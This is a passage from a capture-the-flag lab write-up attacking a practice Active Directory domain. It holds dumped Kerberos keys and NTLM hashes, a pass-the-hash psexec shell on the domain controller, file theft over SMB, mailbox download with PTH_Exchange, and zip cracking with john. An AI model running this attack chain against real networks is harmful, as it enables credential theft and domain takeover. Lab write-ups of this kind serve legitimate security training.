xiaorang.lab\HealthMailboxeda7a84:aes256-cts-hmac-sha1-96:0dfb6bdfa6f3592f55baf1c228686597e00b1361eca1441a1fdf0c3599507fd7
xiaorang.lab\HealthMailboxeda7a84:aes128-cts-hmac-sha1-96:f20b096f3ad270e4c36876fd0f1f4a09
xiaorang.lab\HealthMailboxeda7a84:des-cbc-md5:3458ec32a815ce0b
xiaorang.lab\HealthMailbox33b01cf:aes256-cts-hmac-sha1-96:801e2feead7ae5074578fad5eac0d3dabd92f0445068e0a69232ce5bd8ca76f4
xiaorang.lab\HealthMailbox33b01cf:aes128-cts-hmac-sha1-96:3136e1be7138a8d29fa10bc3f2cf6f99
xiaorang.lab\HealthMailbox33b01cf:des-cbc-md5:3283a2dc518680f7
xiaorang.lab\HealthMailbox9570292:aes256-cts-hmac-sha1-96:f3aba1d52f3131e46d916fbd04817b43281b76b86b56dad24f808538e91363cc
xiaorang.lab\HealthMailbox9570292:aes128-cts-hmac-sha1-96:ee9802236d43d7e5695190232c044d63
xiaorang.lab\HealthMailbox9570292:des-cbc-md5:37d30719e940d679
xiaorang.lab\HealthMailbox3479a75:aes256-cts-hmac-sha1-96:721d8bcbbe316a0ec1a7f0aa3ce3519b4d7c3281a571e900b41384e5583d2c84
xiaorang.lab\HealthMailbox3479a75:aes128-cts-hmac-sha1-96:18353920e23e46ef0a834fe5cd5a481b
xiaorang.lab\HealthMailbox3479a75:des-cbc-md5:8a3d2cf261386ba8
xiaorang.lab\HealthMailbox2d45c5b:aes256-cts-hmac-sha1-96:ff6aac30c110e42185c90561d0befebb0b462553737d05aec9c6dcb660612ffd
xiaorang.lab\HealthMailbox2d45c5b:aes128-cts-hmac-sha1-96:5117b1a04caa9925f508eeb0bd6ffa35
xiaorang.lab\HealthMailbox2d45c5b:des-cbc-md5:df2ca48c1525dccb
xiaorang.lab\HealthMailboxec2d542:aes256-cts-hmac-sha1-96:a63a5cb34f7d503c61af2a96508ed826b0ad4daf10198f2b709b75bc58789e90
xiaorang.lab\HealthMailboxec2d542:aes128-cts-hmac-sha1-96:bfe7ece929174b6ba1d643e87f37cf7a
xiaorang.lab\HealthMailboxec2d542:des-cbc-md5:5bf42601e608df31
xiaorang.lab\HealthMailboxf5f7dbd:aes256-cts-hmac-sha1-96:824ea1eadc05dc8b0ed26c3ff0696c9e2fc145ad2d08dd5dbb1c6428f4eb074f
xiaorang.lab\HealthMailboxf5f7dbd:aes128-cts-hmac-sha1-96:c62918a735c4fde6b5db99d9c441200c
xiaorang.lab\HealthMailboxf5f7dbd:des-cbc-md5:46e654e5649d6732
xiaorang.lab\HealthMailbox67dc103:aes256-cts-hmac-sha1-96:c439db29ecbe032623449f1298a0537e6ed26c71dbd457574ac710c0e7c175e4
xiaorang.lab\HealthMailbox67dc103:aes128-cts-hmac-sha1-96:a952200f4f439c33c289f5a5408f902b
xiaorang.lab\HealthMailbox67dc103:des-cbc-md5:751013ef3ee36225
xiaorang.lab\HealthMailbox320fc73:aes256-cts-hmac-sha1-96:a00af0ea0627c6497a806ebcd11c432f7c9658044ca4947438bfca3e371a8363
xiaorang.lab\HealthMailbox320fc73:aes128-cts-hmac-sha1-96:af5f9c02443cef462bb6b5456b296d60
xiaorang.lab\HealthMailbox320fc73:des-cbc-md5:1949dc2c7c98bc20
xiaorang.lab\Lumia:aes256-cts-hmac-sha1-96:25e42c5502cfc032897686857062bba71a6b845a3005c467c9aeebf10d3fa850
xiaorang.lab\Lumia:aes128-cts-hmac-sha1-96:1f95632f869be1726ff256888e961775
xiaorang.lab\Lumia:des-cbc-md5:313db53e68ecf4ce
Zhangtong:aes256-cts-hmac-sha1-96:ae16478a2d05fedf251d0050146d8d2e24608aa3d95f014acd5acb9eb8896bd5
Zhangtong:aes128-cts-hmac-sha1-96:970b0820700dfa60e2c7c1af1d4bbdd1
Zhangtong:des-cbc-md5:9b61b3583140c4b5
XIAORANG-WIN16$:aes256-cts-hmac-sha1-96:168e6cf85d503904792474fe1ae9fe04b3706402ad0dad11f17039f92f6ed033
XIAORANG-WIN16$:aes128-cts-hmac-sha1-96:434eda0e158169b3ec9cfc36eb0b56c8
XIAORANG-WIN16$:des-cbc-md5:fe457f9716d33b68
XIAORANG-EXC01$:aes256-cts-hmac-sha1-96:76253835716e7b41cada5d7ef47e2503e3d9638be1b481878e8fc5db0ad7baa1
XIAORANG-EXC01$:aes128-cts-hmac-sha1-96:c322f45c7e5a37bfc0feefbe09fafd65
XIAORANG-EXC01$:des-cbc-md5:6de546da467fbaf8
XIAORANG-PC$:aes256-cts-hmac-sha1-96:2b8247145b4d99664affb06d332f9a1ae55af8068e27d0b0deb11d0ace8353a9
XIAORANG-PC$:aes128-cts-hmac-sha1-96:7304e348a7fbec88bb643d729bba3994
XIAORANG-PC$:des-cbc-md5:a1452ca192fec767
[*] Cleaning up...

We now have the domain admin hash; next, move laterally:

xiaorang.lab\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7acbc09a6c0efd81bfa7d5a1d4238beb:::

psexec in as domain admin and take the domain controller:

└─# proxychains -q impacket-psexec xiaorang.lab/Administrator@172.22.3.2 -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb -codec GBK
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on 172.22.3.2.....
[*] Found writable share ADMIN$
[*] Uploading file NmVfoAWG.exe
[*] Opening SVCManager on 172.22.3.2.....
[*] Creating service Qcsg on 172.22.3.2.....
[*] Starting service Qcsg.....
[!] Press help for extra shell commands
Microsoft Windows [版本 10.0.14393]
(c) 2016 Microsoft Corporation。保留所有权利。

C:\Windows\system32> cd C:\users\administrator

C:\Users\Administrator> dir
驱动器 C 中的卷没有标签。
卷的序列号是 0637-3CEF

C:\Users\Administrator 的目录

2022/10/23 21:34 <DIR> .
2022/10/23 21:34 <DIR> ..
2022/10/23 14:34 <DIR> Contacts
2022/10/23 14:34 <DIR> Desktop
2022/10/23 14:34 <DIR> Documents
2022/10/23 14:34 <DIR> Downloads
2022/10/23 14:34 <DIR> Favorites
2022/10/23 21:34 <DIR> flag
2022/10/23 14:34 <DIR> Links
2022/10/23 14:34 <DIR> Music
2022/10/23 14:34 <DIR> Pictures
2022/10/23 14:34 <DIR> Saved Games
2022/10/23 14:34 <DIR> Searches
2022/10/23 14:34 <DIR> Videos
0 个文件 0 字节
14 个目录 28,635,594,752 可用字节

C:\Users\Administrator> type flag\f*

flag\flag.txt


____ ___.___ _____ ________ __________ _____ _______ ________
\ \/ /| | / _ \ \_____ \\______ \ / _ \ \ \ / _____/
\ / | |/ /_\ \ / | \| _/ / /_\ \ / | \/ \ ___
/ \ | / | \/ | \ | \/ | \/ | \ \_\ \
/___/\ \|___\____|__ /\_______ /____|_ /\____|__ /\____|__ /\______ /
\_/ \/ \/ \/ \/ \/ \/



flag04: flag{411ce50b-da03-44e8-95a3-7058a3c711ca}

PTH Exchange

Finally, look at the remaining host, 172.22.3.26:

└─# proxychains -q impacket-smbclient -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/administrator@172.22.3.26 -dc-ip 172.22.3.2
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# use C$
# cd /Users/Lumia/Desktop
# ls
drw-rw-rw- 0 Sun Oct 23 21:40:24 2022 .
drw-rw-rw- 0 Sun Oct 23 20:22:44 2022 ..
-rw-rw-rw- 282 Sun Oct 23 20:22:55 2022 desktop.ini
-rw-rw-rw- 668436 Sun Oct 23 21:40:16 2022 secret.zip
# get secret.zip

The flag is inside the archive, which is password-protected.

Earlier we obtained Lumia's hash:

xiaorang.lab\Lumia:1146:aad3b435b51404eeaad3b435b51404ee:862976f8b23c13529c2fb1428e710296:::

Jumbo-WJB/PTH_Exchange ("If you only have hash, you can still operate exchange") can fetch the mailbox with it:

python pthexchange.py  --target https://mail.exchange.com --username "yourusername" --password "yourpassword" --action Download

Then download the mail:

└─# proxychains -q python pthexchange.py  --target https://172.22.3.9/ --username "Lumia" --password "862976f8b23c13529c2fb1428e710296:862976f8b23c13529c2fb1428e710296" --action Download
2025-09-07 17:38:13,461 - DEBUG - [Stage 777] Get Mails Stage 1 Finditem ing...
/usr/lib/python3/dist-packages/ntlm_auth/rc4.py:18: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
algo = algorithms.ARC4(key)
2025-09-07 17:38:14,936 - DEBUG - [Stage 777] Get Mails Stage 2 GetItem ing...
2025-09-07 17:38:18,530 - DEBUG - [Stage 777] Get Mails Stage 3 Downloaditem ing...
[+] Item [output/item-0.eml] saved successfully
2025-09-07 17:38:18,539 - DEBUG - [Stage 555] Ready Download Attachmenting...
2025-09-07 17:38:18,794 - DEBUG - [Stage 555] Determine if there are attachments in the email...
2025-09-07 17:38:18,794 - DEBUG - [Stage 555] This Mail Has Attachment...
2025-09-07 17:38:18,794 - DEBUG - [Stage 555] Start Get Attachment Content...
2025-09-07 17:38:21,245 - DEBUG - [Stage 555] Start Download Attachment...
[+] Item [output/item-0-secret.zip] saved successfully
2025-09-07 17:38:21,249 - DEBUG - [Stage 777] Get Mails Stage 2 GetItem ing...
2025-09-07 17:38:21,448 - DEBUG - [Stage 777] Get Mails Stage 3 Downloaditem ing...
[+] Item [output/item-1.eml] saved successfully
2025-09-07 17:38:21,449 - DEBUG - [Stage 555] Ready Download Attachmenting...
2025-09-07 17:38:21,635 - DEBUG - [Stage 555] Determine if there are attachments in the email...
2025-09-07 17:38:21,635 - DEBUG - [Stage 555] This Mail Has Attachment...
2025-09-07 17:38:21,635 - DEBUG - [Stage 555] Start Get Attachment Content...
2025-09-07 17:38:21,847 - DEBUG - [Stage 555] Start Download Attachment...
[+] Item [output/item-1-phone lists.csv] saved successfully

This yields several files, including an email that says "Encrypt with your phone number." The hint is that the archive password is a phone number, so extract the phone numbers from the CSV and brute-force the zip with them:

└─# cut -d ',' -f3 item-1-phone\ lists.csv > phone.txt

┌──(root㉿butt3rf1y)-[/home/butt3rf1y/PTH_Exchange-main/output]
└─# zip2john item-0-secret.zip >hash
ver 2.0 item-0-secret.zip/flag.docx PKZIP Encr: cmplen=668284, decmplen=671056, crc=AFEF0968 ts=AB91 cs=afef type=8

┌──(root㉿butt3rf1y)-[/home/butt3rf1y/PTH_Exchange-main/output]
└─# john --wordlist=phone.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
18763918468 (item-0-secret.zip/flag.docx)
1g 0:00:00:00 DONE (2025-09-07 17:45) 16.66g/s 8350p/s 8350c/s 8350C/s phone..15989600577
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The password is 18763918468.

flag03: flag{cf0c753c-233f-4729-8984-0746ea5878b7}

Author: butt3rf1y
Published: 14 September 2025